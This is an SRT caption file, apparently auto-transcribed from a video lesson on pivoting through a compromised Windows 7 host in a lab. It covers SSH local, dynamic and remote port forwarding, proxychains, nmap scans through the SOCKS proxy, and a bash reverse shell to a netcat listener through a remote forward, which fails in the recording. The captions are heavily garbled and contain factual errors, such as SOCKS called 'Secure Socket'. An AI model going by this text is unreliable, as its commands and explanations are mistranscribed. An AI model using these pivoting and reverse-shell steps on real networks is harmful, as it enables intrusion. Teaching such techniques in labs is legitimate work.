1
00:00:00,810 --> 00:00:06,510
So we're guessing this jury will be discussing about the pivoting towards the also will discuss a few

2
00:00:06,510 --> 00:00:09,730
basics, that is as paneling and stocks.

3
00:00:09,750 --> 00:00:11,930
And then we will discuss the proxy case.

4
00:00:12,150 --> 00:00:14,910
So first, this is the scenario we have.

5
00:00:14,940 --> 00:00:19,160
This is the attacker box and how the IP address 192 168 010.

6
00:00:19,650 --> 00:00:22,850
OK, I can see a session before.

7
00:00:23,460 --> 00:00:29,060
So I see CIPA does have the generic default and Windows seven box.

8
00:00:29,100 --> 00:00:32,240
So this is also having 24 subnet.

9
00:00:32,480 --> 00:00:34,580
OK, so 250 variables.

10
00:00:35,010 --> 00:00:36,660
Uh, this is 20.

11
00:00:36,660 --> 00:00:38,400
And he said, OK, that's fine.

12
00:00:38,430 --> 00:00:44,610
So we have the connection from this attacker box to the phone box so you can ping from this box to this

13
00:00:44,610 --> 00:00:46,950
box and this one to seven.

14
00:00:47,040 --> 00:00:59,090
How second, the physical network character and that contains the range 126 are the IP, uh, 126 that

15
00:00:59,130 --> 00:01:00,580
wanted to slash twenty four.

16
00:01:00,840 --> 00:01:07,580
So this is how another adapter and it is connected to this, uh, something that is more than 30.

17
00:01:08,520 --> 00:01:15,300
And here there is another machine that is spreadable and this has that IP address.

18
00:01:15,300 --> 00:01:17,220
Fifty four.

19
00:01:19,020 --> 00:01:26,440
So suppose you have compromised this with the sound machine and got the reversal so you can just uh

20
00:01:26,760 --> 00:01:28,220
think that this is over.

21
00:01:28,230 --> 00:01:29,190
But it's not.

22
00:01:29,550 --> 00:01:37,650
You can if you want to pivot into this internal, uh, infrastructure, you need to see what other adapters

23
00:01:37,650 --> 00:01:39,100
this computer is having.

24
00:01:39,390 --> 00:01:43,010
So it has another network adapter that is connected to this network.

25
00:01:43,170 --> 00:01:47,300
So that means there may be some more machines in this subnet.

26
00:01:47,670 --> 00:01:52,480
So with this machine, you need to scan the center subnet for the light wash.

27
00:01:52,770 --> 00:01:57,350
And after scanning, what you get is this list of IP addresses that are.

28
00:01:57,870 --> 00:01:59,570
So you get the 50.

29
00:01:59,640 --> 00:02:02,120
So one to one computer is 50.

30
00:02:02,250 --> 00:02:09,210
So that means this Windows seven with this adapter has been connected to the network and this spreadable

31
00:02:09,570 --> 00:02:11,370
also connected to this network.

32
00:02:11,490 --> 00:02:14,250
So that means this machine can ping this machine.

33
00:02:15,540 --> 00:02:23,850
OK, so you only be compromising this machine then only you can perform the Skansen attacks on these

34
00:02:23,850 --> 00:02:26,460
matters without compromising this one.

35
00:02:26,470 --> 00:02:32,010
You cannot actually, uh, uh, let me try this.

36
00:02:33,550 --> 00:02:40,560
So without compromising this one, if you want to try to pin to this so you will not be able to see

37
00:02:40,560 --> 00:02:52,650
because there is no route to this, uh, uh, IP address because it's subnet is, uh, uh, the two

38
00:02:52,670 --> 00:02:53,510
to divorce.

39
00:02:53,760 --> 00:02:56,670
So enamored of Sprite, uh, will see in upcoming.

40
00:02:56,670 --> 00:03:01,500
We just, uh, we can add routes via this box with the sound box.

41
00:03:01,620 --> 00:03:07,670
So we will be adding the road to this whole subnet, 126 dot one twenty four.

42
00:03:07,920 --> 00:03:08,460
Why are the.

43
00:03:09,030 --> 00:03:12,180
So then you can bring this attacker to.

44
00:03:13,380 --> 00:03:15,390
So that's how you do it.

45
00:03:15,980 --> 00:03:19,170
Uh, but today we will be discussing about this story.

46
00:03:19,930 --> 00:03:21,660
Not think of this as a scenario.

47
00:03:24,090 --> 00:03:25,790
Um, OK.

48
00:03:25,980 --> 00:03:33,950
For uh this is nothing but, uh, it creates a tension between this machine and this machine.

49
00:03:34,260 --> 00:03:39,900
So this, uh, securely, uh, transfers the data from this box to this box.

50
00:03:40,110 --> 00:03:45,060
So this will be very helpful when you have a server, but you don't have a certificate.

51
00:03:45,300 --> 00:03:53,010
So in that case, uh, if any user wants to log in, you can just create the, uh, this assistant and

52
00:03:53,010 --> 00:03:54,970
then you can send the credentials independent.

53
00:03:54,990 --> 00:03:56,640
So it will be very safe.

54
00:03:57,930 --> 00:04:01,170
So that's what I want to discuss about the socks.

55
00:04:02,390 --> 00:04:04,760
Socks stands for Secure Socket.

56
00:04:05,430 --> 00:04:13,050
So it is, uh, protocol that supports this secure tunnel and taxis of passion for.

57
00:04:14,760 --> 00:04:15,900
And version five.

58
00:04:16,140 --> 00:04:18,080
So this version is very secure.

59
00:04:18,090 --> 00:04:23,860
You can said the you know, the password to get access software is another indicator.

60
00:04:23,940 --> 00:04:29,150
So you can just create spin up the tunnel and you can send the data, OK?

61
00:04:29,250 --> 00:04:34,170
Now, what we're going to discuss is, uh, three types of put forward.

62
00:04:34,620 --> 00:04:35,080
OK.

63
00:04:35,250 --> 00:04:37,280
One is the local put forward.

64
00:04:37,840 --> 00:04:44,700
Suppose this machine that is trying to access the web server on the witness box.

65
00:04:44,890 --> 00:04:45,810
So generally.

66
00:04:48,320 --> 00:04:53,440
Uh, it will, uh, it will.

67
00:04:55,600 --> 00:05:04,750
Oh, stop the logging attempt from this book, because maybe this port maybe filled by some firewall

68
00:05:04,840 --> 00:05:06,020
in the middle of this.

69
00:05:07,480 --> 00:05:14,070
So if I'm trying to attempt from the portal, maybe it's blocking the port city better.

70
00:05:14,170 --> 00:05:15,070
This is a firewall.

71
00:05:15,280 --> 00:05:25,820
So know, what I can do is I can use this, as it were, to create a local port that is said to to do

72
00:05:25,890 --> 00:05:26,270
to.

73
00:05:26,590 --> 00:05:32,860
So this is a local port and I want to local put forward to this Windows seven box.

74
00:05:33,370 --> 00:05:43,660
So whenever I do that, then I can send normally the Web page credentials to this port of my eye, this

75
00:05:43,660 --> 00:05:45,070
IP address and this port.

76
00:05:45,190 --> 00:05:51,670
So then, uh, this soxer would automatically send this packet to this portal.

77
00:05:52,030 --> 00:05:56,830
So that's, uh, one way to bypass these firewalls.

78
00:05:58,150 --> 00:06:00,760
So you need to first log into the message.

79
00:06:00,760 --> 00:06:03,760
So you need to get the credentials.

80
00:06:06,160 --> 00:06:12,940
So this year, this will be very useful in the crowd because the fireworks are continuously brocks the

81
00:06:12,940 --> 00:06:19,420
fact that because no one from the public should characterize it also of observer or any other service.

82
00:06:19,430 --> 00:06:24,950
So that's why this is very helpful when granting to the William Synagro.

83
00:06:25,900 --> 00:06:28,270
So this is a local port authority.

84
00:06:28,360 --> 00:06:37,230
So there will be some random portanova on our machine that will be connected to any machine, other

85
00:06:37,230 --> 00:06:38,050
remote machine.

86
00:06:38,350 --> 00:06:44,710
And whatever we package we send to this port, it will be far greater to this remote mission.

87
00:06:44,740 --> 00:06:53,940
So that is the local port forwarding and you going to the symbol and the next one is a dynamic put forward.

88
00:06:55,450 --> 00:07:00,200
So the difference between local and the dynamic is mortara are possible.

89
00:07:00,550 --> 00:07:07,890
So in the local port, Ferreri, you can forward the packets coming to these two two, two, two, two,

90
00:07:07,930 --> 00:07:16,750
three, one port so you can transfer transfer the package for the baggage from two to two to 280 of

91
00:07:16,760 --> 00:07:17,460
the seven.

92
00:07:18,730 --> 00:07:23,970
So only one port to one board, that is the local ports are already so dynamic port.

93
00:07:24,100 --> 00:07:30,540
What you need to do is you can say to to to do to start.

94
00:07:31,450 --> 00:07:39,700
So that means you can send for this package to any the port and the vendors are.

95
00:07:39,700 --> 00:07:47,590
So by setting this you can scan the web server, Yuganskneftegaz, or you can do anything you want but

96
00:07:47,590 --> 00:07:52,180
only applies to the TCBY, but you can scan the UDP ports.

97
00:07:53,770 --> 00:07:56,260
So that is the dynamic put forward.

98
00:07:56,290 --> 00:08:03,760
The only difference is you can put forward the packets from our machine to any other TV port in the

99
00:08:03,760 --> 00:08:04,420
dynamic port.

100
00:08:04,990 --> 00:08:06,640
So these are almost equal.

101
00:08:08,710 --> 00:08:19,700
But the defense in this, uh, number of robots, uh, we can so the next one is a remote spot for every

102
00:08:20,170 --> 00:08:21,490
so remote spot.

103
00:08:21,490 --> 00:08:24,610
Ferreri is opposite to the Rover Woodforde.

104
00:08:24,940 --> 00:08:28,000
So suppose he's the Windows seven box, OK?

105
00:08:28,480 --> 00:08:31,150
And at the commission, I am running a Web server.

106
00:08:32,710 --> 00:08:37,170
So normally this think of this as a client machine.

107
00:08:37,180 --> 00:08:39,040
So I want to connect to this web server.

108
00:08:41,340 --> 00:08:51,070
So I want to connect to this Web server and know how this whenever a client is connecting, I suppose,

109
00:08:51,130 --> 00:08:56,970
said this is the client and this is what is connected to the attacker machine for the Web server and

110
00:08:57,240 --> 00:09:01,050
then connecting it can obtain the IP address of this attacker machine.

111
00:09:01,140 --> 00:09:03,030
So 192, 168, 02.

112
00:09:03,210 --> 00:09:06,660
So this is my IP and it can be seen by this.

113
00:09:07,380 --> 00:09:09,880
So this can be another attacker.

114
00:09:10,140 --> 00:09:17,190
So if they know IP address, they can scan and they'll do some, uh, they can find the vulnerabilities.

115
00:09:17,520 --> 00:09:26,160
So in order to hide my IP address, I know what I can do is I can send remote port forwarding to this

116
00:09:26,160 --> 00:09:32,520
machine right here to this machine port Numerati.

117
00:09:33,930 --> 00:09:36,250
So this is a remote port for all.

118
00:09:36,330 --> 00:09:43,380
So that means instead of sending this packet to this attacker, the package should be sent to this.

119
00:09:44,860 --> 00:09:46,670
Box Windows seven box.

120
00:09:46,990 --> 00:09:55,140
OK, so whatever the package arrives at this Windows seven box at Potente, then they will be transformed,

121
00:09:55,150 --> 00:09:58,840
automatically transferred to this our political machine.

122
00:09:59,410 --> 00:10:06,280
So what this will do is it will take this I.P. address coronate in the browser and this packet will

123
00:10:06,280 --> 00:10:11,180
be forwarded to this port and then it will send the packets again to this.

124
00:10:11,530 --> 00:10:17,670
So that means your I.P. address is being withheld from the metastable.

125
00:10:17,860 --> 00:10:19,810
So all they need to know is this.

126
00:10:19,810 --> 00:10:28,900
I told you this matters, but we can never know the IP address unless they know they compromised this

127
00:10:28,900 --> 00:10:29,220
machine.

128
00:10:29,230 --> 00:10:37,990
So otherwise it will be very safe so that you use, uh, this is very helpful in hiding the IP address

129
00:10:37,990 --> 00:10:40,450
and proxy and firewalls, et cetera.

130
00:10:40,840 --> 00:10:42,790
So this is the basic and certainly.

131
00:10:46,280 --> 00:10:46,870
So again.

132
00:10:51,150 --> 00:11:00,420
Now, what we need to do is, uh, uh, we reset the dynamic for, uh, from this attacker box to this

133
00:11:00,420 --> 00:11:06,710
Wintersun box, so using the first proxy, Chanes then will be able to scan this machine.

134
00:11:07,110 --> 00:11:08,500
So let's go and do that.

135
00:11:08,730 --> 00:11:10,380
So my current up.

136
00:11:14,060 --> 00:11:22,700
So if you want to set the environment, ignore what your mission manager so you can predict premiums

137
00:11:22,730 --> 00:11:27,120
when is called the next one and so it can be any three.

138
00:11:27,350 --> 00:11:27,800
So.

139
00:11:27,800 --> 00:11:28,820
Right, click on this.

140
00:11:29,930 --> 00:11:30,860
Go to settings.

141
00:11:32,530 --> 00:11:38,450
So you can see the character is so it is very on it tomorrow, OK, that's fine.

142
00:11:38,740 --> 00:11:45,400
I have the IP address, I have config, so I have the IP address, 192 unstitched zero or not.

143
00:11:45,480 --> 00:11:50,020
For the next one is Windows seven box Gregan settings.

144
00:11:51,400 --> 00:12:00,320
And here I have one that is connected to my router and also I have another area that is custom young.

145
00:12:00,760 --> 00:12:02,980
So you can choose any of this except this net.

146
00:12:03,430 --> 00:12:07,300
So real need one and then.

147
00:12:11,010 --> 00:12:18,600
In this third machine, I also have the William Net1, so that means a DVD on Box and these matters

148
00:12:18,680 --> 00:12:20,640
where according to one network.

149
00:12:20,790 --> 00:12:23,990
So that means these can to communicate to each other.

150
00:12:24,000 --> 00:12:27,000
But these cannot Soccerex power on.

151
00:12:58,680 --> 00:12:59,020
OK.

152
00:12:59,040 --> 00:13:03,720
Meanwhile, how does my IP address.

153
00:13:07,490 --> 00:13:10,040
So let me show you the proxy, Cain's.

154
00:13:16,510 --> 00:13:23,860
So it's in their territory proxy for that configuration and did enter the password.

155
00:13:26,720 --> 00:13:30,140
And if you go down so in the chain.

156
00:13:47,650 --> 00:13:52,880
So you can add the proxy here, so sock's for one person roboroach nine zero four zero.

157
00:13:53,170 --> 00:13:59,100
So this will set up sites for server on this nine 050 port.

158
00:13:59,770 --> 00:14:08,540
OK, now you can direct traffic to this port and this will be a circuit.

159
00:14:08,580 --> 00:14:12,820
This will follow the traffic from here to the machine you want to follow.

160
00:14:13,750 --> 00:14:21,580
So already nine 050 port is working, so log in to my inbox.

161
00:14:26,030 --> 00:14:28,040
And also in respectable.

162
00:14:36,210 --> 00:14:45,010
So if you take pyper so you can see I have one, and that is one 26 one coordinate, right.

163
00:14:45,780 --> 00:14:48,810
So now let's go to my witness box.

164
00:15:02,620 --> 00:15:09,310
So, OK, open CMT Sordi, baby confect.

165
00:15:12,060 --> 00:15:19,320
So you can see I have one adapter that is connected to my router, one zero three and also up to see

166
00:15:19,320 --> 00:15:22,070
another one of these 128.

167
00:15:22,200 --> 00:15:24,980
So that means I can be this one.

168
00:15:29,000 --> 00:15:34,850
So we're going to bring this matter spreadable and hit enter and again see the ping backwards.

169
00:15:36,390 --> 00:15:40,020
So let's try to ping, for this matter, metastable.

170
00:15:44,630 --> 00:15:46,700
So you cannot speak because there is no rule.

171
00:15:48,140 --> 00:15:54,710
So, again, no, what we need to do is I haven't installed this open as it so you can download and

172
00:15:54,710 --> 00:16:04,390
install normally in the, uh, any companies, the computers, how there's such a normal range.

173
00:16:05,030 --> 00:16:15,560
So that's why I can say it's a switch and binary code for saying it would be and use the four nine zero

174
00:16:15,560 --> 00:16:16,880
five zero, which is already

175
00:16:19,670 --> 00:16:20,450
running.

176
00:16:20,450 --> 00:16:21,700
The server is running.

177
00:16:21,710 --> 00:16:24,290
So it's typing the IP address.

178
00:16:27,010 --> 00:16:32,290
So username, address, IP, address any data and type in the password.

179
00:16:35,230 --> 00:16:44,740
So you can see we have successfully logged in now open the new terminal so you can go to the Web browser

180
00:16:46,270 --> 00:16:49,300
and I know the port is it is open.

181
00:16:49,300 --> 00:16:50,050
So that's a.

182
00:16:53,180 --> 00:16:54,680
Let's open the Web browser.

183
00:17:01,190 --> 00:17:05,690
So go to the settings preferences.

184
00:17:08,240 --> 00:17:08,900
Proxy.

185
00:17:12,820 --> 00:17:23,470
And choose the manner and Southwest, that is our Brocklehurst and Posterboard here, nine 050, make

186
00:17:23,470 --> 00:17:29,000
sure that it is successful, otherwise it will ask for username, password and.

187
00:17:29,110 --> 00:17:29,410
OK.

188
00:17:29,580 --> 00:17:36,280
OK, now I need to use you can go to this website online to do.

189
00:17:40,640 --> 00:17:50,630
On these matters where now you can tell so you can see now we can access this because all we have edited

190
00:17:50,630 --> 00:17:56,600
our whole traffic to the proxy and niederer to traffic to these Windows seven box.

191
00:17:57,030 --> 00:17:58,590
So this sound box.

192
00:17:59,510 --> 00:18:01,300
Of course, you can connect to these matters.

193
00:18:02,180 --> 00:18:06,320
So that's why we have some connection through this association.

194
00:18:06,800 --> 00:18:08,740
That's why we got the results.

195
00:18:09,590 --> 00:18:12,310
And if you want, you can build this one.

196
00:18:13,490 --> 00:18:22,010
So this is one important method to set the proxy kind of proxy and click on talk and all of this so

197
00:18:22,010 --> 00:18:24,290
you will not get to the desert.

198
00:18:26,780 --> 00:18:29,930
Because you can use the proxy Jane's comment.

199
00:18:32,630 --> 00:18:41,450
So proxy change come in and you can see Firefox and the IP address, so it will open this page in this

200
00:18:41,450 --> 00:18:45,170
Firefox users and that will be the route to the proxy cards.

201
00:18:50,080 --> 00:18:59,320
And now you can see, no matter what do and you can see here, there is a statue and you can see the

202
00:18:59,320 --> 00:19:04,360
traffic is going from this nine zero five zero two and port city of murders.

203
00:19:04,510 --> 00:19:04,600
The.

204
00:19:06,610 --> 00:19:09,730
OK, so now you can control see.

205
00:19:10,270 --> 00:19:11,770
And also you can.

206
00:19:14,730 --> 00:19:15,840
To the can.

207
00:19:23,200 --> 00:19:31,420
And you can test for samples for 21, maybe 22 and the IP address.

208
00:19:41,940 --> 00:19:48,810
You can see he has successfully scanned are the ports and you can also do the Russians can take something

209
00:19:49,170 --> 00:19:51,820
so you can do that and maybe can using this for oxygens.

210
00:19:52,020 --> 00:19:57,810
So this is one method to putting into the infrastructure, using approximations.

211
00:19:57,870 --> 00:20:00,150
OK, now let's explore this.

212
00:20:01,950 --> 00:20:06,660
And I want to show you the remote port forwarding says this.

213
00:20:06,660 --> 00:20:07,170
It's.

214
00:20:09,630 --> 00:20:19,170
R capital R, So you noticed this very our IP address sorry, this window, Sevan's IP address here.

215
00:20:21,550 --> 00:20:25,930
This is this one on line to do 168, 106, 108.

216
00:20:32,030 --> 00:20:46,360
Karen, and you need this was where to put Richard O 666 colon and specify our IP address, that is

217
00:20:46,820 --> 00:20:49,740
localhost colon, one, two, three, four.

218
00:20:49,940 --> 00:20:59,240
So what this means I am forwarding this IP address and at this point, so suppose, uh, some traffic

219
00:20:59,240 --> 00:21:06,710
is being sent to this exact spot of this lessoned machine, then the traffic will be redirected to my

220
00:21:07,100 --> 00:21:09,180
localhost at the one, two, three, four.

221
00:21:09,320 --> 00:21:17,090
It's similar to this, uh, remote Ruggie from metastable to attack that up in the civil service.

222
00:21:17,360 --> 00:21:17,970
Similar one.

223
00:21:18,110 --> 00:21:20,720
But this is the remote control.

224
00:21:21,230 --> 00:21:23,420
So that's logging it or less on machine.

225
00:21:30,350 --> 00:21:32,080
And now take the password.

226
00:21:34,300 --> 00:21:44,620
So we are successfully locked in so you can set up the listener, so on the what we have given our other

227
00:21:44,620 --> 00:21:48,400
parties, one, two, three, four, one, two, three, four.

228
00:21:48,570 --> 00:21:51,420
And so we are listening in on the beautiful.

229
00:21:51,430 --> 00:21:59,040
So not only is it no matter what we do, I will create the rehearsal and see and we and the IP address

230
00:21:59,050 --> 00:22:10,210
I specifies these Windows seven, box 128 and the number 666, because that if you send the data to

231
00:22:10,210 --> 00:22:15,100
this traffic to this port, then you will get this traffic at one, two, three, four.

232
00:22:15,670 --> 00:22:17,860
OK, on ninety two.

233
00:22:21,580 --> 00:22:32,890
128, six, six, six, six and up on execution, so upon going to execute this big bash and hit enter.

234
00:22:36,640 --> 00:22:39,070
So you have got some connection reviews.

235
00:22:54,990 --> 00:22:59,280
So I do know that everything.

236
00:23:23,870 --> 00:23:26,570
OK, now let's see this.

237
00:23:30,220 --> 00:23:34,210
Sort of 127 zero zero on that, where our idea of setting.

238
00:23:45,600 --> 00:23:46,890
And now he can tell.

239
00:23:53,930 --> 00:23:55,450
We are sitting on one, two, three, four.

240
00:23:57,680 --> 00:23:59,750
So let's execute this.

241
00:24:05,420 --> 00:24:05,760
OK.

242
00:24:05,810 --> 00:24:08,460
I don't know why we are getting this connection.

243
00:24:08,490 --> 00:24:09,140
The first.

244
00:24:11,500 --> 00:24:13,080
So everything seems fine.

245
00:24:21,810 --> 00:24:30,680
OK, OK, unless you give it a try once a proxy, Jane sees enough again executed, in my opinion,

246
00:24:30,880 --> 00:24:35,390
again, the website in a Web browser.

247
00:24:35,400 --> 00:24:38,990
So I don't know why this net is fading.

248
00:24:39,300 --> 00:24:41,200
So you guys want to give it a try.

249
00:24:41,340 --> 00:24:43,630
So that's horrible for this video.

250
00:24:43,920 --> 00:24:46,400
I'll be using this literally.

251
00:24:46,420 --> 00:24:49,490
So actually awesome to see using the like.